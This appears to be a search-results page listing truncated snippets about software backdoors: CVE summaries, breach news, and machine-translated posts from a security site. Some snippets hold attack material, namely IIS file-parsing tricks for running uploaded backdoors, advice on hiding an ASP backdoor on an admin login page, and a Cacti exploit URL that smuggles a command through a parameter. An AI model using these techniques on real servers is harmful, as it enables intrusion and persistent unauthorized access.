40 matches found
CVE-2022-34053
The DR-Web-Engine package in PyPI v0.2.0b0 was discovered to contain a code execution backdoor via the request package. This vulnerability allows attackers to access sensitive user information and digital currency keys, as well as escalate privileges...
CVE-2019-10842
Arbitrary code execution via backdoor code was discovered in bootstrap-sass 3.2.0.3, when downloaded from rubygems.org. An unauthenticated attacker can craft the ___cfduid cookie value with base64 arbitrary code to be executed via eval, which can be leveraged to execute arbitrary code on the target...
CVE-2019-10842
CVE-2019-10842 describes an arbitrary code execution backdoor in bootstrap-sass 3.2.0.3 when downloaded from rubygems.org. An unauthenticated attacker can craft the ___cfduid cookie value with base64-encoded code to be executed via eval(), enabling remote code execution on the target system. The ...
ASUS Patches Live Update Bug That Allowed APT to Infect Thousands of PCs
ASUS has expedited a patch for a major bug impacting thousands of PCs that allowed an advanced persistent threat group to launch a supply-chain attack dubbed “Operation ShadowHammer.” The vulnerability targeted a range of new ASUS PCs with a backdoor injection technique tied to the PC-maker’s...
CVE-2017-12860
The Epson "EasyMP" software is designed to remotely stream a user's computer to supporting projectors. These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming. In addition to the password, each projector has a hardcoded...
Hardcoded credentials
The Epson "EasyMP" software is designed to remotely stream a user's computer to supporting projectors. These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming. In addition to the password, each projector has a hardcoded...
CVE-2017-12860
CVE-2017-12860 affects Epson EasyMP software used to remotely stream a user’s computer to projectors. The vulnerability stems from a hardcoded backdoor code (2270) that authenticates to all devices, in addition to the on-screen 4‑digit access code. Reported details indicate a network-accessible i...
Popular remote terminal management tool Xshell implanted with backdoor code, could lead to sensitive information disclosure-vulnerability warning-the black bar safety net
Recently, the very popular remote terminal tool Xshell was found to have been implanted with backdoor code; users running the trojanized version of Xshell may have sensitive information leaked to a machine controlled by the attacker. Xshell particular Build 1322 on the domestic use of the surface...
CVE-2016-8856
Foxit Reader for Mac 2.1.0.0804 and earlier and Foxit Reader for Linux 2.1.0.0805 and earlier suffered from a vulnerability where weak file permissions could be exploited by attackers to execute arbitrary code. After the installation, Foxit Reader's core files were world-writable by default,...
PNG Image Metadata Found Leveraging iFrame Injections
Researchers have discovered a relatively new way to distribute malware that relies on reading JavaScript code stored in an obfuscated PNG file’s metadata to trigger iFrame injections. The technique makes it highly unlikely a virus scanner would catch it because the injection method is so deeply...
NIST Reviews Crypto Standards Development
The National Institute for Standards and Technology has taken an important step toward repairing what the National Security Agency has allegedly fractured by initiating a review of its cryptographic standards development processes. NIST-sponsored algorithms are at the heart of numerous crypto...
Summary of common server parsing vulnerabilities-vulnerability warning-the black bar safety net
Author: laterain. IIS 6.0 directory parsing: /xx.asp/xx.jpg, where xx.jpg can be replaced with any text file (e.g. xx.txt) whose content is the backdoor code; IIS 6.0 will parse xx.jpg as an ASP file. Suffix parsing: /xx.asp;.jpg IIS 6.0 would put such a suffix the file is successfully parse...
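Backdoor code found in the HDwiki new-vulnerability patch package (all versions) of 2012-08-09
Brief description: Backdoor code found in the HDwiki new-vulnerability patch package (all versions) of 2012-08-09. Details: While reading the reference.php file in the patch package, I noticed the following oddity on the first line: base & $get,& $post; $this-load"reference"; requireoncedirnameFILE."/../js/jqeditor/hdwiki.js"; // Right here: why would a perfectly good PHP file include a js file? I then took a look at hdwiki.js in the patch package and finally understood what the vendor was up to. hdwiki.js function delSave...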
UnrealIRCd IRC server multiple security vulnerabilities
Buffer overflow, backdoor code...
The most hidden ASP backdoor-vulnerability warning-the black bar safety net
Today that is in the administrator backend login screen hidden our back door, which is relatively safe, because the administrator of the inlet is not often change, as long as his login screen on our back door just in! 1. From our SHELL found on the administrator portal page 2. Edit it in the...
Not dead shellcode-exploit warning-the black bar safety net
HEE HEE, today the computer some of the things transferred to the mobile hard disk, find yourself previously voted over the few manuscript, crude see an article but there are a few articles or a little heat, simply submit to the evil eight, hope can be a friend in need some help...rookie write the dis...
Cacti 0.8.6d - Remote Command Execution
Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version...